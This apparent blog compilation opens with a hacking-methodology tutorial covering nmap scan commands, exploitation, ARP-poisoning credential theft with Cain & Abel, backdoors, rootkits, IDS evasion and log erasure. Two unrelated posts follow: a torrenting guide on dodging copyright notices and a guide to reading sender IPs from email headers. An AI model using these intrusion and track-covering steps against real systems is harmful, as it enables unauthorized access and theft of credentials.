http://tools.ietf.org/html/rfc4987

Lets talk about the most common TCP Scan types. There are full scan, half open scan, stealth scan, Xmas scan, and ack scan.

full scan: this completes 3 way TCP. it is the most effective & gives more accurate results. However, it is not safe and easily traced and detected.

half open scan: it is the second most effective scanning method, only uses first part of the handshake to get syn-ack but does not send 3rd part (ack) back to the remote host. The idea here is if the remote replies back to you after you have sent syn request, this means the port - we sent the syn to - must be open.

stealth scan: the idea here is to scan ports randomly(not in sequential order) & reduce the speed of scanning. If you scan all port from 1 to 65536 in sequence, your more visible to be detected, and usually scanning happens so fast, which is unusual since regular program does not connect to port that fast, so this can make it easier to be detected. Therefore you have to scan ports randomly & reduce the speed of scanning. To avoid IDS, you should not use full connection scan with stealth scan, you can use half-open scan(syn). syn is considered a stealth scan. In fact, syn scan is called syn-stealth scan, or you can use Xmas scan with stealth scan which helps you to evade detection, things like that! you get my point i guess.

Xmas scan: uses fin, urg, and push flags which are used to bypass some firewalls. Xmas scan works with UNIX system, it does not work with Windows system.

ack scan: this helps you evading IDS not to get you detected. You send only an ack packet to your target, your target won't know how to deal with it since there was no handshake. Thus, ack scan causes open ports in your target machine to return a reset packet(rst), rst packet gives you a hint that the port or service is not filtered between point A and point B, which usually firewal resides in between! Since the port replied you with rst packet this means there is no firewall between A(your machine) & B(port or service on the target machine) and rst packet also gives you an insight that the target port is open ;-). If there is a firewall, your ack packet would not reach to the target port & because of that you won't get any rst packet. In addition, rst packet helps you indentify what system is running on the remote host.

These are the most common method of scans, there are hundreds of scanning methods! nmap allows you to set your own custom scan type e.g. instead of sending ack flags only, you can send ack flag and rst flag together and see what you get back from target ...

OK! we have talked about how TCP scanning works in general. Now, i will be talking about UDP & ICMP Scanning ... UDP and ICMP connections most of the times are blocked at the firewall level & even at the host level in some cases. We are going to scan on hosts & ports that respond via UDP. When you scan your target via UDP, there are many problem will occur during that process e.g. you can scan over the ports via UDP, assume you scanned port 1, and port 1 is closed, then host will send ICMP unreachable back to you, which gives an insight that port is closed because you didn't get any UDP response back from target! Making sense,right? Unfortunately, we will never get a response back from target to ensure you that port is open!

Thats how UDP call works, send the packet & forget it. Lets say we come across port 21, and 21 is open, then port 21 on target machine will not reply back to you because UDP does not give you the guarantee the delivery packets during communication process, it just send the packet and forget, unlike TCP which guarantees the delivery of packets with no loss or corruption. Since we didn't get reply back, then we can assume the port 21 is open *OR* maybe port 21 is closed and ICMP reply got lost somewhere so we didn't get it! A general rule, when you don't get a reply you assume port is open.

Some high professionals security person purposely configure ports to not to respond a UDP scanning. ICMP scanning is as same as UDP. ICMP scanning is noisy & can be picked by IDS very easily because ICMP sends random several pings to the network instead of a single host(ICMP scanning does a 'ping scanning' - sends ICMP packets - to the whole network instead of a single host). After you finish ICMP scanning, based on the replies you get back from the live hosts, then you can determine that your target network is listening for ICMP traffic and you might to do some exploit based on that. Unfortunately, there aren't alot of ICMP exploits going around, so you are just going to use ICMP for network enumeration, you just do it to see what hosts are up, host A is up , host B is up & host C is up, they are replying for my ICMP. Thus, this let us know these 3 hosts are running on the targeted network and potentially can be a target for us. IDS's are always listening for network scans & alot of network scanners provide a support for ICMP scanning, but do not have a way to make it stealthy! Therefore, ICMP can turn on the IDS alert which tells the security person there is somebody scans your whole network.

nmap is a great tool that is very popular, it is usually used to scan networks, hosts, ports, and does alot of other stuff. It is very intrusive tool and considered a hacking tool. Using nmap against systems you dont own or dont have permission to scan can be considered illegal. Lets see examples of some scanning method!

Example of ICMP Scanning(-sP) - this is called ping scan

nmap -v -sP xx.xxx.xxx.xx > filename

nmap: represents the program we are running which nmap.
-v: for increased verbosity, which means bring me extra details of the targeted system. (Optional - as far as i know)
-sP: the flag that determines the scanning method.
x's: target IP address.
> filename: output the results to the newly specified filename. In other words, save results in a file (Optional)

This above command shows you the systems that are up and running, so this shows what available to us on the targeted network. As a result, you will get simple info that shows you there are number of IP addresses that responded to ping request - Note: there could be alot more machines out there that are not responding to ICMP scanning.

Lets see an example of UDP scan, UDP scan not so speed.

nmap -v -sU xx.xxx.xxx.xx

Results of UDP scan(-sU) give more info than ping scan(-sP). Keep in mind there could be hundreds of other ports are listening on the system which simply don't respond to UDP connection.

Useful sources relates to scanning methods via nmap:
http://www.nmap-tutorial.com/pdf/nmap-tutorial.pdf
http://www.petri.co.il/port-scanning-with-nmap.htm

ALRIGHT, now you have a good basic understanding about scanning! Next, i will be talking about fingerprinting! So keep learning :-)

Now lets get deeper! By now we have determined what nodes are running up on the network. So we are ready to gather large info on those live systems we discovered in the previous steps. Ok! now you need to discover what services (application) are running on your target's host. Every (or at least many) port has a service running on it. For example, web server usually are running on port 80. What we have to do is scan ports, see what kind of services(applications) are running on them, try to grab the versions of the services, this will help you to determine the OS as well. This is called 'Port & Service Enumeration(fingerprinting)'. We have to do this step to understand what potential vulnerabilities your target has & how to exploit them.

Assume after we have scanned our target system, we found our target runs "IIS 5.0 Server" on "port 80". Based on the scanning result, you can say the targer server is running IIS 5.0(IIS is set of Internet-based services, IIS is the second most popular web server - IIS is a Microsoft product), it is known IIS 5.0. has too many vulnerabilities & IIS 5.0 runs on Windows 2000, which Windows 2000 by itself has hundreds of vulns.

In other words, lets scan ports and services, and do OS fingerprinting, lets identify services on those live host in our target network. Once we know what services are running and what OS are running then we can start exploiting these services! - 'ping/port/service' scans are frequently run together using the same tool.

NOTE: identifying ports & services is the most critical part in hacking ... PERIOD

OS fingerprinting is used for determining OS type and version, then we exploit vulns. that resides into the OS. When you fingerprint a target, your targets' OS can be known from the TCP/IP stack, so fingerprinting happens on TCP/IP stack. Why? Because each OS has a unique implementation of TCP/IP, so TCP/IP stack is implemented differently from OS to OS, so an exact same query sent to one machine the respond of the result will be different than the other machine. Therefore, based on the response this can help the scanner determines the OS of the target, because every OS has its own unqiue response when you do OS fingerprinting request.

When you do a default install of OS, certain services will be installed by default, services that are needed for that OS to work properly, e.g. ports
137,138,139,and 445 which all combined together to produce Win 2000 OS or above. Another example, a combination of 139 and 445 can determine a certain version of windows such as Win XP or Win 2003, there are lots of ways to determine OS. Another example, if you see a service MS SQL is running on a certain port, you can determine the target OS is not in *nix family, it is in a Win family cause the target is running a Microsoft sql product. Thus, we can say port enumeration or service enumeration can help you in determining OS.

There tons of popular scanners out there:
SuperScan - Works good on Win OS.
Nmap - Works on *nix & Windows, *nix version is much more stable than Win version.

Most scanners offer full, half, stealth, and UDP scans.

You are goning to spend most of your time scanning your target machine to know whats available there, so you can exploit the vulns & penetrate the system. Therefore, you have to do some exploration on scanning methods & decide which method of scanning you feel more comfortable with...

Lets see an example of enumeration style scanning. Just keep in mind, this can be considered hacking! Make sure you do to your system, not somebody's else.

This is kind of a stealth scan:
nmap -v -sS -A -sV xx.xxx.xx.xx > filename

This above request gives you very specific details about your target. sV is for version information identification. Check out the manual to know what these flags do - type "man nmap" to see the manual...

Alright, after we have fingerprinted services & OS, now its the time to check for various vulns against application(services) & OS running on the target system. This is called vulnerability assessment. To do vulnerability assessment, you can use the tools available, such as nessus. Nessus is free vulnerability assessment, huge database, its the best assessment tool.

Lets scan vulns on the target system. Lets say target system is win 2000 SP1 IIS 5.0, nessus goes back to its database and check the vulns for win2000 & IIS 5.0. If there is vulns not discovered, vulnerability assessment tool actually can't catch it. However, if nessus couldn't find matching vulns for the target system, it will let you if the system can have some security issues or not. Such tools are considered as Automated Vulnerability Assessment Tools. You have to know about the target system OS so you can do vuln assessment on it. There are vuln assessment OS specific, e.g. MBSA tool(only scans Win OS).

NOTE: you can do vulnerability assessment manually, this depends on you and your skills. By doing it manually, you can discover vuln. that nobody knows about it, and you can use it for your own use. It is a powerful and very discrete.

After we determined what systems & what services contain vulnerability, then we can exploit it(means take a chance of this vulnerability to achieve what you want).

common vulnerabilities out there are:

OS vulnerabilities
Webserver vulnerabilities
Database vulnerabilities
TCP stack vulnerabilities
Application vulnerabilities

Malwares, viruses, trojans, can be used to exploit vulnerabilities.

There are several automated vulnerability scanners, such as Nessus, Nikto. Security websites is a good resource for vulnerabilities as well, e.g.
bugtraq, CVE(Common Vulnerabilities and Exposures) sites, etc. Another good source to find vulnerabilities is hacker web sites.

Lets talk about the tools:

*Nessus - this is a great vulnerability assessment tool. However, in alot of cases it will perform exploits to see if the OS or service is actually vulnerable or not.

*Metasploit Framework - this is not vuln assessment tool. It is an exploitation tool, it contains hundrands of exploits helps you to exploit the system by using a nice selection of tools.

I will explain shortly about the common vulns...

OS Vulns: OS exploits are used to gain access to the system. OS exploits can used for DoS attacks too. watch the video tutorial. Most OS holes exist from default configuration, services and applications.

Webserver Vulnerabilities: webservers are the most trageted section. All people contact the webserver, thus you never know the hacker than a normal user. Webservers examples, Apache, IIS, and Tomcat. After you exploit the vulnerability in your target webserver, you can gain many different things, such as root access(the gist), website defacement, DoS(put the server down), theft or alteration data on server, or further penetration into the network.
Webserver is a great place to start when you want to do a penetration test!

Database Vulnerabilities: those software vendors who create databases applications such as SQL, Oracle, etc - they dont have security in mind, they care more into effeciency and how to make it easy for the users to handle with the database. They care about making their customers happy without giving that much attention in security issues!

TCP Stack Vulnerabilities: this is not a common used method to hack systems. Google it!

Application Vulnerabilities: some examples of application vulnerability, buffer overflow, weak authentication mechanisms, poor data validation(the most common one), and poor error checking.

ALRIGHT, to discover these vulnerabilities on the target machine you need to do vulnerability assessment. This can be done in two ways, manually or automatically. Manually means you try to discover a vuln. by yourself which eventually you will have vuln. that nobody else knows it & you can use it for yourself or publish it to security sites. Automatically means you rely on a tool that searches for vulns in the target machine, this tool has a database full of vulns. so this 'tool' will only inform you the vulns found in the target machine by relying on 'its' database. We are going to talk about auto vulnerability assessment. The most common & wonderful tool is Nessus, its free open source code!

Alot of common sense comes into play when analyzing vulns, for example you do not look for a database vulnerability in a webserver, things like that. Another resources, OVAL - gives you a good and basic foundation of vulns assess. methodology, FrSIRT - keeps track of vulns and make exploits of these vulns, you can join a paid subscription and then browse vulns avaialbe in their database and download exploits this is a good source for hacking or security, and websites for posting exploits such as milw0rm, hacking sites.

Lets have a closer look at nessus tool, nessus is client/server architecture. The process of setting it up is cumbersome. Nessus have about 9000 plugins, therefore it takes time to peroform the assessment. Results can be reviewed in a report. The report includes the vulnerabilities found on the target machine with a short description about the vulnerability.

Note: you can enable several plug-ins in plugin tab. You can specify range of ports through scan options. To specify the target, you should go to the target tab.

Once we have done the vulnerability assessment, and knew what vulnerabilities exit. We start gathering exploits of the found vulnerabilities to penetrate the system.

Lets talk about penetration and access! After all information we have gathered previously, its the time to break the system with the exploits you have.

Its the time to stop gathering information and start breaking into system. The ultimate goal is to gain the highest level of permissions. Try to use undiscovered techniques and methods. Think out of the box!

Some of exploits that enable penetration are:

*Buffer overflows
*Stack exploits
*Web vulnerabilities
*Services/apps that allow unauthenticated access.

Aside from the standard methods of penetration, lets see an penetration methods, here are some examples:

*SQL Injection - ability to change queries in the application before its sent into database.

*Application Error Handling - this can result DoS. Probably one of the most common vulnerability you can find in corporate arenas.

*Directory Traversal - browse directories you should not be able to do so on.

*Malformed Packets - one of the more difficult methods of penetration, requires very extensive knowledge of how TCP packets are assembled and disassembled. But once you get used to it, its probably the most effective ways of hacking.

*Bypassing Access Controls - password cracking is most common means of accessing systems.

*Social Engineering - i guess you know what it means.

*Sniffers - take passwords right off the wire, alot of protocls and application such as http & ftp communicate parrwods over the wire in plain text.

*Session hijacking - it is similar to sniffers, but you don't gain a password because we take off the entire session, hijack the victim's session & act as you are him.

Usually when you get passwords, you get it encrypted, or hashed or hidden in some way or another. Password cracking can be done in several ways, examples:

*Brute Force Attack - Every password, can and will be broken by brute force attack. It is about the time. Depends on the size of the password.

*Dictionary Attack - less effective than brute force, relies on list of words or phrases.

*Hybrid Attack - combination of different tools. It is a combination of effectivence of brute force and dictionary attacks & often using other attack mechanisms, such as cryptanalysis attack (one of the hybird attack).

You should know that when you do sniffing, you often get usernames & passwords in plain text. However, you can get encrypted passwords from sniffing as well. You will need to use of the cracking techniques discussed above. Sometimes cracking an encrypted passwords can take secs, hours, days, months, or even more!!!

There is a great software called "Cain & Abel", it sniffs passwords from the wire, cracks it, etc. Once you install it, go to sniffers tab, then move to the found passwords in cracker tab to see what you have got! There is lots to it. You should know these techniques as a security person cause if you don't know it, a black hat will take care of it.

Now, assume we already have hacked the system. We will try to do different things, such as getting the root, etc. Penetration & compromise got some differences in the meaning. Hacking into system does not mean you have compromised(taking the full control - take over) the system. After you penetrate the system, you can grab the session between client and server, e.g. you keep listening on login sessions, so when the remote user login to google, the session be dropped to you, once you get the session, the remote user won't be able to get into his account he/she will see at page goes blank(disconnected), so he/she may think its a problem in a connection, thus he/she tries to login again & everything works fine! BUT you already got his session, you won't have to go through login page when you want to see his/her email inbox, cause its already among the whole session you have taken.

Another way to do this, lets say the attacker has compromised the user's system, thus the attacker can let the session drop on his machine, then he takes the session, reads and saves it. After that, he redirects the user to the server, this step will make everything works ok like nothing wrong happen.

Lets see an example of the above explained steps, after attacker installs "Cain & Abel" application, he moves to "attack base system" & click the sniffer button at the top & click the yellow button(APR Poisoning Button) besides the sniffer button. This APR Poising button trick the attacked system to talk to the attacker instead of normally who it talks to. For testing purposes, go and add various system addresses(IP's) to the list. Let say one of the user amongst those targeted IP's logon into 'google', at the authentication process you will notice varies pieces of info comes to you. You are gathering info by getting into the middle of the communication process. Now view the files you have got in the list, you can see among the lines the username & password of the users' 'google' account in plain text! So how dangerous this can be to your privacy :-/! So be careful....

Once the hacker gains access to the system. He aims for admin(root) access. He moves up from guest level, to user level, up to root level. Owning the box, means take the system & prevent the admin from controlling the system, as well as preventing other hackers from getting in. So you hackers usually move on from the regular level, to the admin level so they can have full control. A hacker needs privilege escalation to compromise the system well. Some exploits allow buffer/stack overflows to obtain admin access. All it takes is a guest user, then a hacker can perform exploitations locally & there he goes to the root.

At this point, we did everything up to owning the box. Now our goal is to protect our access. Thus, we want to maintain our access to that hacked system, so we can use it later. You can maintain a system by using such tools, backdoor accounts, backdoor software programs, rootkits, etc. These tools help you maintain access. Some hackers own the box close all other accounts except his account, so the security person shut the system down, reformat the system and start over again.

By doing this, hacker account will be gone. Once we ensure we have maintained our access to the system, then we want to expand ourselves to other parts of the network. Remember, if you do not do this on your own network, somebody else will take care of it. If he does, i do not think you will be too happy! Once you got an access, and could maintain it successfully. You want to prevent detection or loss of access. There are several methods to maintain access, such as rootkits, OS exploits, erase tracks, install trojans that make you access backdoor, enable null sessions (webmaster usually go to the registry & disable null sessions to keep that vuln. from being exploited, webmasters usually do it once & do not get back to it. You can go there & enable it - NOTE: by enabling null sessions you can give other hackers a chance to hack too), and many more.

There different ways of system compromise, system compromise usually depends on your goal, examples of system compromising are root access(ultimate goal), data access/theft, DoS, and many more. Keep in mind, compromised systems can be detected after a while.

Now after a hacker breaks into the system, he tries to portect what he has hacked & erase his tracks. During the attack process try not to be detected so the webmaster don't shut the server off, as well as do not forget to erase your tracks, e.g. you dont want the webmaster to see lots of failed logon in the log files, so you erase tracks to prevent future detection. Typically, get in the network as a shadow or ghost.

There are many method to evade those IDS so they don't cut off your attack stream. Common methods for evading defenses might be by fragmenting packets(some programs do that e.g. fragroute), port redirectors, encoders(change the flow, the look, and feel of various traffics to pass firewall). After you get in and deceive defenses, you want to go to the log files and erase your tracks. Remember: sometimes you get in a user account then you get into a root by changing permissions of the user account, so you have to remember to set this user permissions back to as it was, things like that - you know what i mean, put yourself in a hackers shoe. Don't delete the whole log files, this can make the security person more suspicious. We want to leave everything as it was so nobody can get a feel that an intruder was here.

To be safe, you should know where your actions are recorded, delete log files and other evidences that can get you caught, steganography(google it), and evading IDS & firewalls. All actions are recorded in some place on the system or the network. Assume IDS detects you, what do security persons do? Usually when you get detected, they may cut off all the ways for you so you don't get a chance to penetrate, they probably going track you down, or they may decide let you go but watch you the entire time.

Where are your actions recorded & what things can let security person knows that you hacked his system? they are recorded in log files for various applications(e.g. IIS & Apache log files), file access times(note: there are tools for hackers that allow you to modify file access time), windows registry entries, hacker tools left behind (be aware of the residual configuration you have left behind - make sure you set all the configurations back to as it was), OS performance stats, IDS, proxy servers(make sure how you send and receive data. If you are going to use proxy server, set up a permanent tunnel through the proxy to the remote host that is compromised), and firewalls(usually very rich with logs).

There are various types of IDS, IDS can set anywhere in the network. There are network based IDS, host based IDS, and application based IDS.

Deleting evidences of your hack is extremely difficult, it requires you have a very high knowledge of the system you are trying to compromise(all the prior steps we did, such as scanning, foot printing, etc will be handy to compromise the system). It is easy to cover the known log files, such as web logs, firewall, IDS logs, etc. However, it is important to know how the default logs work. Highly skilled hackers, study the target well & take the time in fingerprinting & footprinting everything properly. It may take him up to one week before he hacks the target, but when he penetrates his job is done more smoothly & quietly. Unlike, the other ones who are just using some tools to break the system as fast as possible without studying the target well.

It is possible to delete log files! It is simple but usually requires admin access. Some files/logs may be deleted automatically with reboot. Don't delete log files, it brings up suspicion. If you do so, the security person can indicates very clearly that a hacker broke into the system.

Most common way of hiding your tracks is by using a rootkit. Rootkit is set of tools used by an attacker after the attacker gets the root-access to system. Rootkits conceals(to keep from being observed) attacker activities on the hacked system. Once rootkit set on the system, its practically impossible to rid of it because rootkit uses technology, called "hooks", that usually most of the time embed itself into various components of OS & effectively the OS going to be a toaster when the rootkit is all set and done. Security person has to rebuild his machine when rootkit is detected after we properly investigate it.

Steganography its about hiding a file into another file. Like hiding a malware into a normal software which makes it difficult for firewall or AV to detect the malware. Thats the basic concept of Steganography. There are alot of tools out there allow us to hide files inside another files.

You can evade IDS & firewalls by using random slow stealth scanning technique so traffic goes unnoticed, this takes longer to scan but makes detection more difficult. Try to use non-standard techniques, think outside the box.

Remember: not everyone out there is a security expert. To secure your system well, you need to put yourself in a hacker set of mind.

By now, you have learned the basic methodology that hackers use to break into the system. Anyhow, lets take a closer look on hacking techniques, such as encryption, sql injection, sniffers, and many more.

Encryption: files can be encrypted in a storage. Communication channels can be encrypted as well, communication channel encryption encrypts the entire communication path, so all traffics sent and received are encrypted, e.g. SSL technology encrypts the entire communication path. There are many ways hackers get away of encrypted traffic & get info in not encrypted form. If you are using your own encryption method, you always should test your encryption for crackability before you use it officially.

Sniffers: sniffers is a common tool used by hackers. Sniffers listens on any traffic that goes through the wire of the target system, listens ins and outs traffics. Promiscuous mode is a mode that is listening for any traffic that goes through the wire. Standard promiscuous mode sniffer is a basic technique. There are more advanced techniques other than promiscuous mode. Sniffing enables the attacker to pick up a plain text, and other sensitive data that goes 'from' or 'to' the target. Sniffers record captured traffic, then after you sniff you can go offline & start analyzing that captured traffic. Popular sniffers are ethereal, etherape, ettercap, and network monitor(for Win OS only - not so effective).

Wireless Hacking: this is a new technology & starts taking place nowadays. Easy to setup, but not frequently secured since not many people understand the security configuration, so they decide not to set it up or set it up poorly. There are various tools that detect wireless networks, popular war driving software are Netstumbler, Airsnort, Airopeek, Kismet, and many more. What is war driving? google it!

SQL Injection: sql injection is a technique that allows an attacker to steal a valuable database information. This attack relies on poor data validation and poor error checking.

Buffer Overflows: buffer overflow is common, the cause of buffer overflow is poor coding. Buffer overflows might be noticed while coding. Buffer overflow happens when the programmer does not clearly define boundaries on buffers or variables. We use out of bound data to insert malicious code or execute command on the remote host. Buffer Overflows can cause programs to freeze or lockup, can cause machine to crash, or let you use exploits & leads you to compromise the system. To build buffer overflows, you need a good programming skills, good knowledge of stack and buffer vulns.

You need to have the ability to research, analyze vulns & apply the exploit to achieve what you want. Buffer overflow is a very common & hard to produce an application with no buffer overflows at all. There is nothing programmers can do about it, they just need to write the code with security mind of set. If unexpected buffer overflow appears later by chance, programmers will have to fix it. Programmers should test their code from vulnerabilities as much as they can before they publish the application.

Rootkits: it is a common hacker technique. Rootkit is malicious program that replaces components of OS. It does a stealth job. Rootkit requires root permission, so you can install it. Linux rootkits are common & you can find them everywhere, unlike Windows. It is very hard to detect a rootkit because it embeds itself so deeply into the target system. Removing rootkit from a system is very hard too, if the security person tries to remove the rootkit out of the system, he will destroy the system since the rootkit is embedded so deeply into the system(into components of OS). The good solution is to format the whole system & install it again.

Spoofing: the word spoofing defined as making yourself appear as somebody else. Examples of spoofing, you can spoof an IP address and make yourself appear to be somewhere else, MAC addresses, and emails(very simple to spoof, you send an email to somebody by changing the headers, and things like that). Spoof usually relies on poor implementation of TCP/IP itself or poor implementation of applications. Tools that are used for spoofing differs from one platform to another. Example of the tools, IP spoofing utilities, MAC address modifiers, etc. Spoofing is more into using your skills rather than using a tool.

Denial of Service (DoS): DoS is very common. The ultimate idea is to prevent legitimate users from using the system. Running DoS is very simple, you don't gain anything from doing DoS. Hackers do it to threat companies, things like that. Many methods/level of DoS attacks exist. Examples of some ways of to DoS, ping of death, Windows size overflow, smurf, teardrop attacks, and many more. There are lots of different ways to do it!

Web Hacking: web hacking is the most popular attacks. It is based on hacking individual sites, servers, or components based on the website. First step a hacker takes is, enumerate services(applications) on target machine, and then determine what webserver software(apache, IIS, etc) is running on the target system. After that, the hacker exploits against vulns. found in the target system. It will be easier to hack if the hacker knows the version of the service/software running.

A webserver attack leads to deeper penetration on the network(move into the target's internal network). Popular attack methods are xxs(cross-site scripting), IIS DLL vulnerabilities(IIS is very commonly exploited), directory traversal, unicode attack, and many more.

What is Unicode attack?
here is quick rough description about Unicode attack, lets say you want to pass space into a URL. If you put a space in URL, webserver will not take your URL, webserver will consider the url is invalid. Thus, if you want to put spaces among the URL, you should put the number 20 in a place of the space(number 20 represents the space), so when the URL goes to the webserver, the webserver says Ok! thats a valid URL, lets process it and so it does. Unicode attack uses this technique in a non-standard(bad way) way to attack the webserver. Thats a quick explaination about unicode attack.

I'm already about to finish this tutorial, i will just talk about popular tools in a brief manner. I will start with namp.

Nmap is the most popular hacker tool outhere. Linux command line nmap works better and is supported better. Nmap comes with ping utility, port scanning utility, service enumeration & OS fingerprinting.

SuperScan is a windows based tool developed by foundstone Inc. Its easy to use it & a good tool for Windows.

Nessus is used for vulnerability assessment. It is an open source software kit, with commercial version available as well. Nessus uses client/server architecute. Server will be installed on a central location. Nessus comes in GUI & command line interface. Nessus uses database that carries latest current exploits for all types of OS & application. Databases in nessus are called plug-ins, hundrends of vulnerability plug-ins exist and are updated daily to include latest exploits. Nessus requires high level of knowledge to use the tool very effeciently. You can go out to the web and download an exploit and then add it to the database. Nessus can take quite long time to do vulnerability assessment.

Finally, the information in this tutorial have been gathered from various types of sources, and then i wrote the tutorial in an organized manner from scratch as well as i added some stuff & clarified many parts.

After you have read this tutorial, i recommend you to search and learn about Windows Null Sessions, it is the most critical flaws associated with Windows OS, and google about DNS zone transfers!

This tutorial is a good guide for you that gives you an insight on how to start & different techniques that hackers use and how they are used. I hope you have enjoyed this tutorial & helped you in someway or another. I'm not supporting any illegal activities. This tutorial for people who wants to know how hackers think, what steps they take to break into systems & how they do it, so people can have an insight on how to protect themselves against intruders.

***This tutorial is made for educational purposes only***

Best Regards,
ʇsıʎqqoɥ

A tutorial about speeding up torrent download and list of sites

2009-01-03T05:13:00.000-08:00

A tutorial about speeding up torrent download and list of sites
Download Bit Torrent Files.

What is Bit Torrent in Plain English?
Bit Torrent is a program you download. It is similar to a peer-to-peer file sharing service. Basically it goes like this: You download the installer. You get the link to a file that ends in .torrent and enter that URL into your browser (preferably Internet Explorer). This opens the Bit Torrent download window. It starts downloading the file, or episode that you wanted (eg. alias2x01.torrent). As it downloads, it uploads the parts that you have to other people so many people can get it at once. When you've finished downloading the file, you can leave the window open (don't press finish or close the window) and other people can still download from you. This is very much encouraged.
I'm new to all this. How do I download with Bit Torrent???

First we need to download and install a Bit Torrent client

Official client 3.3
CODE
http://www.bitconjurer.org/BitTorrent/index.html

Experimental client 3.2.1b-2
CODE
http://ei.kefro.st/projects/btclient

TheShad0w Experimental S-5.8.3
CODE
http://home.elp.rr.com/tur

Azureus 2.0.3.0
CODE
http://azureus.sourceforge.net/

burst! RC5d
CODE
http://krypt.dyndns.org:81/torrent/download.phtml
BT++ 0.5.4 alpha [code]http://btplusplus.sourceforge.net

Shareaza 1.8.9.22
CODE
http://www.shareaza.com

Nova Torrent 0.2.0
CODE
http://blackflaw.dyndns.org

SimpleBT 0.1.9
CODE
http://sourceforge.net/projects/simplebt

BitAnarch 1.0.5a
CODE
http://sourceforge.net/projects/bitanarch/

Personal Torrent Collector 0.8.2.2
CODE
http://ptc.sourceforge.net

Effusion 0.3.3 beta
CODE
http://www.azrael-uk.f2s.com/az/effusion

Snark 0.5 beta
CODE
http://www.klomp.org/snark

ByteTorrent 0.95
CODE
http://sourceforge.net/projects/bytetorrent/

ABC 2.5
CODE
http://pingpong-abc.sourceforge.net

Note:
If you’re client freezes during D/Ls, it’s a problem with your network card or modem, this happens when you connect to more peers than you’re card or modem can handle & windows shuts it down. There is a cure. Shad0ws Experimental client allows you to set how many incoming peers to allow.

All about BT:
CODE
http://www.dessent.net/btfaq/#now_what

How to D/L Torrent files

Bit Torrent is not like other peer-to-peer applications (such as Winmx, Kazaa, Gnutella, etc.) in that it does not have its own \"universe.\" Put another way, BT lives on top of the Web, which means that all of the searching/listing of available files is done on the web. When you find a file you want to download, you click on it and the Bit Torrent client program will run and ask you where to put it, and then start downloading. Or you save target as. Save the file somewhere then click on it when you’re ready to start the D/L.

It doesn't do anything it says:
Problem connecting to tracker - timeout exceeded
Problem connecting to tracker - HTTP Error 503: Connect failed
Problem connecting to tracker - [Error socket error] (10061, \" Connection refused\")
Problem connecting to tracker - (111, \'Connection refused\'

Generally just wait ... this normally means that the \'Tracker\' is maybe too busy. Leave your window open and it will try to connect every 2 minutes or so.

Note: BT dose resume downloads, just click the torrent file again when you are ready to resume the D/L and save it to same place as the original. All clients have an option for default D/L directory. I suggest setting this option.

My speed is always very slow!!!!!!!!!!

Speeds can be real slow if you’re one of the below, they all can bet set to allow BT in and out

#1 behind a firewall
#2 behind a router
#3 on a network
#4 XP firewall is enabled

ports 6881 thru 6999 need to be open to get good speeds

If you need info on bit torrent and how to set it up with a firewall or router

CODE
http://knowbuddy.dyndns.org/torrent/btclientconfig.html

Get general info on how torrent works and how it uses ports

CODE
http://knowbuddy.dyndns.org/torrent/btclientconfig.html

http://www.dessent.net/btfaq/

Where do I get torrent files???

Supernova mirrors are the best sites, updated every 20 minutes.

CODE
http://www.suprnova.org

There are others you can use here is another one:
CODE
http://www.torrentbox.com

Places to find other torrent sites
CODE
http://torrentlinks.com/index.php?action=displaycat&catid=10
http://members.chello.nl/~p.wiersema/
http://home.quicknet.nl/qn/prive/romeria/bittorrentsites.htm

Torrent Search engine
CODE
http://novasearch.net/

Keeping up with the torrent network
CODE
http://www.digital-update.com/forums/attachment.php?s=&postid=163113
http://www.filesoup.com/phpBB2/index.php
http://www.lickmytaint.com/
http://suprnova.org/

Peer Guardian

What does Peer Guardian actually do?

Peer Guardian does two things to help P2P users. The first is the obvious one; it closes connections on certain IP addresses. The second is that it optionally logs all connections made to your computer. The reason for this is so that if you do use Peer Guardian but still get sent a legal threat, you can cross-reference the date/time of the alleged infringement with the log. This gives us a list of IPs, one of which will be the IP that's doing the busting. It's basically to help us identify which IPs are doing the busting and weren't known to Peer Guardian before. - Hope that makes sense.

Is Peer Guardian 100% Protection?

CERTAINLY NOT!!! - Peer Guardian relies on users sharing information to stay up to date. It IS contributory to protection and (I'm not trying to blow my own trumpet here!!) it seems to be the most up-to-date and open database of this nature on the internet (as far as I know). The more people who are using full-logging and report the relevant IPs when they get a C&D threat (see above paragraph), the more people we can save. ANONYMOUS P2P is the way ahead IMHO, Peer Guardian isn't 100% effective.. I've NEVER claimed that and never will and I look forward to the day that PG (not just the app, more.. the database and communication between p2p'ers on blocking IPs) becomes totally redundant. I'm just trying to help supply the next-best thing until we get to that stage.

I use Peer Guardian and have still been sent a legal threat.

What do I do?

First of all, stop sharing the file you got busted with. If you're worried, try sharing older/rarer files. If you share Bourne Identity, Terminator 3 and a load of Bust Rhymes mp3s after being busted, you'll be asking for trouble. Second thing to do, check the "full connection log" in Peer Guardian. (you did have it enabled didn't you?) - Work out the difference in time zones on the infringement warning and cross-reference it with the log. From this you should be able to identify a handful of IPs. Either posts that list to the PG forums for one of our adman’s/moderators/members to investigate or investigate it yourself and post the p2p enemy IP to the on-line database. - There are plans to automate this whole process in the future.

CODE
http://www.peerguardian.net/

Well it isn't really much of a tutorial but I spent a lot of time on this so please help me out if it is wrong.

Finding IP address of sender in Yahoo, Gmail, and Hotmail.

2009-01-03T05:09:00.000-08:00

All about IP Add.....Finding IP address of sender in Yahoo, Gmail, and Hotmail.
Finding IP Address of the Sender in Hotmail!!
• Log into your Hotmail account with your username and password.
• Click on the Mail tab on the top.
• Open the mail.
• If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
• Click on Options on the top-right corner
• In the Mail Options page, click on Mail Display Settings
• In Message Headers, make sure advanced option is checked.
• Click on Ok button
• Go back to the mails and open that mail.
• If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
• Hotmail headers: Daniel, In this case the IP address of the sender is [68.34.60.59]. This is being the IP address of the sender.
• If you find a header with Received: from followed by a Gmail proxy like this
• Hotmail headers : Daniel
• Look for Received: from followed by IP address within square brackets []. In this case, the IP address of the sender is [69.140.7.58].
• Or else if you have headers like this
• Hotmail headers : Daniel
• Look for Received: from followed by IP address within square brackets [].
In this case, the IP address of the sender is [61.83.145.129].
• If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
Finding IP Address of the sender in Yahoo Mail!!
• Log into your Yahoo! mail with your username and password.
• Click on Inbox or whichever folder you have stored your mail.
• Open the mail.
• If you do not see the headers above the mail message, your headers are not displayed . To display the headers,
• Click on Options on the top-right corner
• In the Mail Options page, click on General Preferences
• Scroll down to Messages where you have the Headers option
• Make sure that Show all headers on incoming messages is selected
• Click on the Save button
• Go back to the mails and open that mail.
• You should see similar headers like this:
• Yahoo! headers: Daniel.
